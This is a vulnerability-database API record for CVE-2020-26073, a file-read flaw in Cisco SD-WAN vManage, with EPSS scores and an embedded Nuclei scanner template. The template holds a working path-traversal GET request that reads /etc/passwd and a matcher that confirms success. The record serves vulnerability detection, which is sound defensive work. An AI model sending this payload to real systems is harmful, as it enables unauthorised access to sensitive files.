{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-26073/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-26073/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-26073/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-26073/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-26073/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-26073"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-26073"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.12583,
      "kev": false,
      "percentile": 0.96058
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2020/CVE-2020-26073.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2020-26073\n\ninfo:\n  name: Cisco SD-WAN vManage Software - Local File Inclusion\n  author: madrobot\n  severity: high\n  description: |\n    Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.\n  impact: |\n    An attacker can exploit this vulnerability to read sensitive files on the affected system.\n  remediation: |\n    Apply the latest security patches provided by Cisco to fix the vulnerability.\n  reference:\n    - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html\n    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073\n  classification:\n    cve-id: CVE-2020-26073\n    epss-score: 0.12583\n    epss-percentile: 0.96058\n  metadata:\n    max-request: 1\n  tags: cve,cve2020,cisco,lfi,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd\"\n\n    matchers-condition: and\n    matchers:\n      - type: status\n        status:\n          - 200\n\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n        part: body\n# digest: 4a0a00473045022100c4102834ae02da4f1ce9f94b3e56604eb39cfbdb5093279614b9b6dec860be8e02201f47ab3bf8008ccf1c788493cbb90164817d3fa1ea122b8c2a3495390e92dd0b:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2020-26073"
}